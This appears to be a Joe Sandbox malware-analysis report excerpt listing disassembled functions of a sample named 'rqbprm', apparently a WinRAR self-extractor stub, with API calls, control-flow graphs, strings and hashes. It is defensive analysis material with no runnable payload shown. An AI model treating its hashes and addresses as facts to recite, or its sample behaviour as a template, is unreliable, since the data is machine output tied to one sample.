                                                                                                • Part of subcall function 00C7C73F: __EH_prolog.LIBCMT ref: 00C7C744
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7C1FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 581453772-2608530638
                                                                                              • Opcode ID: 494211987701d7557f72b827f2be5cb0d1aba03c24d37ab52ded69e93374b5fb
                                                                                              • Instruction ID: 23e4cf337df9b89b8d5fdd05ad6d542d316cb5a6bfa382728fcb5d8832befaf3
                                                                                              • Opcode Fuzzy Hash: 494211987701d7557f72b827f2be5cb0d1aba03c24d37ab52ded69e93374b5fb
                                                                                              • Instruction Fuzzy Hash: 51422871944249BFEB21AB70DC8AFBE3B7CAB06704F048059F659A61D2CB749F44DB21
                                                                                              Function 00C70863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 268 c70863-c70886 call c7ec50 GetModuleHandleW 271 c708e7-c70b48 268->271 272 c70888-c7089f GetProcAddress 268->272 275 c70c14-c70c40 GetModuleFileNameW call c6c29a call c70602 271->275 276 c70b4e-c70b59 call c875fb 271->276 273 c708a1-c708b7 272->273 274 c708b9-c708c9 GetProcAddress 272->274 273->274 277 c708e5 274->277 278 c708cb-c708e0 274->278 290 c70c42-c70c4e call c6b146 275->290 276->275 284 c70b5f-c70b8d GetModuleFileNameW CreateFileW 276->284 277->271 278->277 287 c70b8f-c70b9b SetFilePointer 284->287 288 c70c08-c70c0f CloseHandle 284->288 287->288 291 c70b9d-c70bb9 ReadFile 287->291 288->275 297 c70c50-c70c5b call c7081b 290->297 298 c70c7d-c70ca4 call c6c310 GetFileAttributesW 290->298 291->288 294 c70bbb-c70be0 291->294 296 c70bfd-c70c06 call c70371 294->296 296->288 305 c70be2-c70bfc call c7081b 296->305 297->298 307 c70c5d-c70c7b CompareStringW 297->307 308 c70ca6-c70caa 298->308 309 c70cae 298->309 305->296 307->298 307->308 308->290 311 c70cac 308->311 312 c70cb0-c70cb5 309->312 311->312 313 c70cb7 312->313 314 c70cec-c70cee 312->314 317 c70cb9-c70ce0 call c6c310 GetFileAttributesW 313->317 315 c70cf4-c70d0b call c6c2e4 call c6b146 314->315 316 c70dfb-c70e05 314->316 327 c70d73-c70da6 call c64092 AllocConsole 315->327 328 c70d0d-c70d6e call c7081b * 2 call c6e617 call c64092 call c6e617 call c7a7e4 315->328 322 c70ce2-c70ce6 317->322 323 c70cea 317->323 322->317 325 c70ce8 322->325 323->314 325->314 333 c70df3-c70df5 ExitProcess 327->333 334 c70da8-c70ded GetCurrentProcessId AttachConsole call c83e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00C7087C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C7088E
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C708BF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C70B69
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C70B83
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C70B93
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00C93C7C,00000000), ref: 00C70BB1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C70C09
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C70C1E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00C93C7C,?,00000000,?,00000800), ref: 00C70C72
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00C93C7C,00000800,?,00000000,?,00000800), ref: 00C70C9C
                                                                                              • GetFileAttributesW.KERNEL32(?,?,00C93D44,00000800), ref: 00C70CD8
                                                                                                • Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
                                                                                                • Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858
                                                                                              • _swprintf.LIBCMT ref: 00C70D4A
                                                                                              • _swprintf.LIBCMT ref: 00C70D96
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • AllocConsole.KERNEL32 ref: 00C70D9E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00C70DA8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00C70DAF
                                                                                              • _wcslen.LIBCMT ref: 00C70DC4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00C70DD5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00C70DDC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00C70DE7
                                                                                              • FreeConsole.KERNEL32 ref: 00C70DED
                                                                                              • ExitProcess.KERNEL32 ref: 00C70DF5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 1207345701-3298887752
                                                                                              • Opcode ID: 89b4dafa43a1090e7dae79bc24e6d69a20dad28c5dc16040f99b3520c7bfc3e4
                                                                                              • Instruction ID: 0b907d0391d9a67eb5cc09a5f1f1fc91d5dc5724a418fb2165caa00d6fe7981b
                                                                                              • Opcode Fuzzy Hash: 89b4dafa43a1090e7dae79bc24e6d69a20dad28c5dc16040f99b3520c7bfc3e4
                                                                                              • Instruction Fuzzy Hash: 3DD13FF10083C4ABDF359F50C88DB9FBBE8BB85704F50491DF59996250DBB09A49CB62
                                                                                              Function 00C7C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 347 c7c73f-c7c757 call c7eb78 call c7ec50 352 c7d40d-c7d418 347->352 353 c7c75d-c7c787 call c7b314 347->353 353->352 356 c7c78d-c7c792 353->356 357 c7c793-c7c7a1 356->357 358 c7c7a2-c7c7b7 call c7af98 357->358 361 c7c7b9 358->361 362 c7c7bb-c7c7d0 call c71fbb 361->362 365 c7c7d2-c7c7d6 362->365 366 c7c7dd-c7c7e0 362->366 365->362 367 c7c7d8 365->367 368 c7c7e6 366->368 369 c7d3d9-c7d404 call c7b314 366->369 367->369 370 c7ca5f-c7ca61 368->370 371 c7c9be-c7c9c0 368->371 372 c7c7ed-c7c7f0 368->372 373 c7ca7c-c7ca7e 368->373 369->357 384 c7d40a-c7d40c 369->384 370->369 375 c7ca67-c7ca77 SetWindowTextW 370->375 371->369 377 c7c9c6-c7c9d2 371->377 372->369 378 c7c7f6-c7c850 call c7a64d call c6bdf3 call c6a544 call c6a67e call c66edb 372->378 373->369 376 c7ca84-c7ca8b 373->376 375->369 376->369 380 c7ca91-c7caaa 376->380 381 c7c9e6-c7c9eb 377->381 382 c7c9d4-c7c9e5 call c87686 377->382 433 c7c98f-c7c9a4 call c6a5d1 378->433 385 c7cab2-c7cac0 call c83e13 380->385 386 c7caac 380->386 389 c7c9f5-c7ca00 call c7b48e 381->389 390 c7c9ed-c7c9f3 381->390 382->381 384->352 385->369 403 c7cac6-c7cacf 385->403 386->385 394 c7ca05-c7ca07 389->394 390->394 396 c7ca12-c7ca32 call c83e13 call c83e3e 394->396 397 c7ca09-c7ca10 call c83e13 394->397 422 c7ca34-c7ca3b 396->422 423 c7ca4b-c7ca4d 396->423 397->396 407 c7cad1-c7cad5 403->407 408 c7caf8-c7cafb 403->408 410 c7cb01-c7cb04 407->410 413 c7cad7-c7cadf 407->413 408->410 411 c7cbe0-c7cbee call c70602 408->411 415 c7cb06-c7cb0b 410->415 416 c7cb11-c7cb2c 410->416 431 c7cbf0-c7cc04 call c8279b 411->431 413->369 419 c7cae5-c7caf3 call c70602 413->419 415->411 415->416 434 c7cb76-c7cb7d 416->434 435 c7cb2e-c7cb68 416->435 419->431 428 c7ca42-c7ca4a call c87686 422->428 429 c7ca3d-c7ca3f 422->429 423->369 430 c7ca53-c7ca5a call c83e2e 423->430 428->423 429->428 430->369 446 c7cc06-c7cc0a 431->446 447 c7cc11-c7cc62 call c70602 call c7b1be GetDlgItem SetWindowTextW SendMessageW call c83e49 431->447 452 c7c855-c7c869 SetFileAttributesW 433->452 453 c7c9aa-c7c9b9 call c6a55a 433->453 443 c7cb7f-c7cb97 call c83e13 434->443 444 c7cbab-c7cbce call c83e13 * 2 434->444 470 c7cb6c-c7cb6e 435->470 471 c7cb6a 435->471 443->444 457 c7cb99-c7cba6 call c705da 443->457 444->431 475 c7cbd0-c7cbde call c705da 444->475 446->447 454 c7cc0c-c7cc0e 446->454 481 c7cc67-c7cc6b 447->481 458 c7c90f-c7c91f GetFileAttributesW 452->458 459 c7c86f-c7c8a2 call c6b991 call c6b690 call c83e13 452->459 453->369 454->447 457->444 458->433 468 c7c921-c7c930 DeleteFileW 458->468 490 c7c8b5-c7c8c3 call c6bdb4 459->490 491 c7c8a4-c7c8b3 call c83e13 459->491 468->433 474 c7c932-c7c935 468->474 470->434 471->470 478 c7c939-c7c965 call c64092 GetFileAttributesW 474->478 475->431 488 c7c937-c7c938 478->488 489 c7c967-c7c97d MoveFileW 478->489 481->369 485 c7cc71-c7cc85 SendMessageW 481->485 485->369 488->478 489->433 492 c7c97f-c7c989 MoveFileExW 489->492 490->453 497 c7c8c9-c7c908 call c83e13 call c7fff0 490->497 491->490 491->497 492->433 497->458
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C7C744
                                                                                                • Part of subcall function 00C7B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00C7B3FB
                                                                                              • _wcslen.LIBCMT ref: 00C7CA0A
                                                                                              • _wcslen.LIBCMT ref: 00C7CA13
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00C7CA71
                                                                                              • _wcslen.LIBCMT ref: 00C7CAB3
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00C7CBFB
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00C7CC36
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00C7CC46
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00CAA472), ref: 00C7CC54
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C7CC7F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 2804936435-312220925
                                                                                              • Opcode ID: 1aad36cc68da419ab1aa3730ddb3519a5b1f3aa27f83c30579c39a56df338f4a
                                                                                              • Instruction ID: 424a4525d5ddc83f014d7955bf6c2af0a70486c48909cea79a8f3452fdd104d1
                                                                                              • Opcode Fuzzy Hash: 1aad36cc68da419ab1aa3730ddb3519a5b1f3aa27f83c30579c39a56df338f4a
                                                                                              • Instruction Fuzzy Hash: 09E156B2900159AADF25DBA0DC85EEE73BCAF04350F1481AAF619E7050EB749F849F64
                                                                                              Function 00C6DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C6DA70
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C6DAAC
                                                                                                • Part of subcall function 00C6C29A: _wcslen.LIBCMT ref: 00C6C2A2
                                                                                                • Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0
                                                                                                • Part of subcall function 00C71B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C6BAE9,00000000,?,?,?,00010414), ref: 00C71BA0
                                                                                              • _wcslen.LIBCMT ref: 00C6DDE9
                                                                                              • __fprintf_l.LIBCMT ref: 00C6DF1C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 566448164-801612888
                                                                                              • Opcode ID: 5514f9adaf081cca973f276ac0e1fdc26c565a318770af77b647bc132d454f9a
                                                                                              • Instruction ID: 3c62a0b2e41153fd6de1ac290ba0b68692df00f11c231fb2f4084881bae186ec
                                                                                              • Opcode Fuzzy Hash: 5514f9adaf081cca973f276ac0e1fdc26c565a318770af77b647bc132d454f9a
                                                                                              • Instruction Fuzzy Hash: C332F175A00218EBCF34EF68C885BEE77A5FF05704F40016AF9169B281EBB19E85DB54
                                                                                              Function 00C7D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
                                                                                                • Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
                                                                                                • Part of subcall function 00C7B568: IsDialogMessageW.USER32(00010414,?), ref: 00C7B59E
                                                                                                • Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
                                                                                                • Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6
                                                                                              • GetDlgItem.USER32(00000068,00CBFCB8), ref: 00C7D4E8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00C7AF07,00000001,?,?,00C7B7B9,00C9506C,00CBFCB8,00CBFCB8,00001000,00000000,00000000), ref: 00C7D510
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7D51B
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7D529
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D53F
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C7D559
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D59D
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C7D5AB
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D5BA
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D5E1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00C943F4), ref: 00C7D5F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: eb3c96aecd10339099c203fa12455cbdb811eccbf563173ba753e7a9fb2d36f4
                                                                                              • Instruction ID: 70e4ac23f4480e7ad503e506b89e44e629ec61fe448c643190e59bf30ea80e77
                                                                                              • Opcode Fuzzy Hash: eb3c96aecd10339099c203fa12455cbdb811eccbf563173ba753e7a9fb2d36f4
                                                                                              • Instruction Fuzzy Hash: 4831B372145382AFE301EF20EC4AFAF7FACEB8A748F008518F55196191DB659A088776
                                                                                              Function 00C7D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 836 c7d78f-c7d7a7 call c7ec50 839 c7d7ad-c7d7b9 call c83e13 836->839 840 c7d9e8-c7d9f0 836->840 839->840 843 c7d7bf-c7d7e7 call c7fff0 839->843 846 c7d7f1-c7d7ff 843->846 847 c7d7e9 843->847 848 c7d812-c7d818 846->848 849 c7d801-c7d804 846->849 847->846 850 c7d85b-c7d85e 848->850 851 c7d808-c7d80e 849->851 850->851 852 c7d860-c7d866 850->852 853 c7d837-c7d844 851->853 854 c7d810 851->854 858 c7d86d-c7d86f 852->858 859 c7d868-c7d86b 852->859 856 c7d9c0-c7d9c2 853->856 857 c7d84a-c7d84e 853->857 855 c7d822-c7d82c 854->855 860 c7d82e 855->860 861 c7d81a-c7d820 855->861 862 c7d9c6 856->862 857->862 863 c7d854-c7d859 857->863 864 c7d882-c7d898 call c6b92d 858->864 865 c7d871-c7d878 858->865 859->858 859->864 860->853 861->855 866 c7d830-c7d833 861->866 870 c7d9cf 862->870 863->850 871 c7d8b1-c7d8bc call c6a231 864->871 872 c7d89a-c7d8a7 call c71fbb 864->872 865->864 867 c7d87a 865->867 866->853 867->864 873 c7d9d6-c7d9d8 870->873 882 c7d8be-c7d8d5 call c6b6c4 871->882 883 c7d8d9-c7d8e6 ShellExecuteExW 871->883 872->871 881 c7d8a9 872->881 876 c7d9e7 873->876 877 c7d9da-c7d9dc 873->877 876->840 877->876 880 c7d9de-c7d9e1 ShowWindow 877->880 880->876 881->871 882->883 883->876 885 c7d8ec-c7d8f9 883->885 887 c7d90c-c7d90e 885->887 888 c7d8fb-c7d902 885->888 889 c7d925-c7d944 call c7dc3b 887->889 890 c7d910-c7d919 887->890 888->887 891 c7d904-c7d90a 888->891 892 c7d97b-c7d987 CloseHandle 889->892 905 c7d946-c7d94e 889->905 890->889 898 c7d91b-c7d923 ShowWindow 890->898 891->887 891->892 895 c7d989-c7d996 call c71fbb 892->895 896 c7d998-c7d9a6 892->896 895->870 895->896 896->873 899 c7d9a8-c7d9aa 896->899 898->889 899->873 902 c7d9ac-c7d9b2 899->902 902->873 904 c7d9b4-c7d9be 902->904 904->873 905->892 906 c7d950-c7d961 GetExitCodeProcess 905->906 906->892 907 c7d963-c7d96d 906->907 908 c7d974 907->908 909 c7d96f 907->909 908->892 909->908
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00C7D7AE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00C7D8DE
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00C7D91D
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00C7D959
                                                                                              • CloseHandle.KERNEL32(?), ref: 00C7D97F
                                                                                              • ShowWindow.USER32(?,00000001), ref: 00C7D9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                              • String ID: .exe$.inf
                                                                                              • API String ID: 36480843-3750412487
                                                                                              • Opcode ID: 387584cb4a412d33b707a7afe5e5e3f0eeac304304000bf00fad0e010e46051b
                                                                                              • Instruction ID: 0ff833aa8bb5abed1df4cbd998241cd06cdc7729dd5b6347f25fba1a0bed0e42
                                                                                              • Opcode Fuzzy Hash: 387584cb4a412d33b707a7afe5e5e3f0eeac304304000bf00fad0e010e46051b
                                                                                              • Instruction Fuzzy Hash: DF51E4710043809ADB319F24E845BAFBBF4AF85744F04841EFADA971A1DB71CB85DB52
                                                                                              Function 00C8A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 910 c8a95b-c8a974 911 c8a98a-c8a98f 910->911 912 c8a976-c8a986 call c8ef4c 910->912 913 c8a99c-c8a9c0 MultiByteToWideChar 911->913 914 c8a991-c8a999 911->914 912->911 922 c8a988 912->922 916 c8ab53-c8ab66 call c7fbbc 913->916 917 c8a9c6-c8a9d2 913->917 914->913 919 c8a9d4-c8a9e5 917->919 920 c8aa26 917->920 923 c8aa04-c8aa15 call c88e06 919->923 924 c8a9e7-c8a9f6 call c92010 919->924 926 c8aa28-c8aa2a 920->926 922->911 929 c8ab48 923->929 938 c8aa1b 923->938 924->929 937 c8a9fc-c8aa02 924->937 926->929 930 c8aa30-c8aa43 MultiByteToWideChar 926->930 932 c8ab4a-c8ab51 call c8abc3 929->932 930->929 931 c8aa49-c8aa5b call c8af6c 930->931 939 c8aa60-c8aa64 931->939 932->916 941 c8aa21-c8aa24 937->941 938->941 939->929 942 c8aa6a-c8aa71 939->942 941->926 943 c8aaab-c8aab7 942->943 944 c8aa73-c8aa78 942->944 946 c8aab9-c8aaca 943->946 947 c8ab03 943->947 944->932 945 c8aa7e-c8aa80 944->945 945->929 948 c8aa86-c8aaa0 call c8af6c 945->948 950 c8aacc-c8aadb call c92010 946->950 951 c8aae5-c8aaf6 call c88e06 946->951 949 c8ab05-c8ab07 947->949 948->932 963 c8aaa6 948->963 954 c8ab09-c8ab22 call c8af6c 949->954 955 c8ab41-c8ab47 call c8abc3 949->955 950->955 966 c8aadd-c8aae3 950->966 951->955 962 c8aaf8 951->962 954->955 968 c8ab24-c8ab2b 954->968 955->929 967 c8aafe-c8ab01 962->967 963->929 966->967 967->949 969 c8ab2d-c8ab2e 968->969 970 c8ab67-c8ab6d 968->970 971 c8ab2f-c8ab3f WideCharToMultiByte 969->971 970->971 971->955 972 c8ab6f-c8ab76 call c8abc3 971->972 972->932
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C85695,00C85695,?,?,?,00C8ABAC,00000001,00000001,2DE85006), ref: 00C8A9B5
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C8ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00C8AA3B
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C8AB35
                                                                                              • __freea.LIBCMT ref: 00C8AB42
                                                                                                • Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              • __freea.LIBCMT ref: 00C8AB4B
                                                                                              • __freea.LIBCMT ref: 00C8AB70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
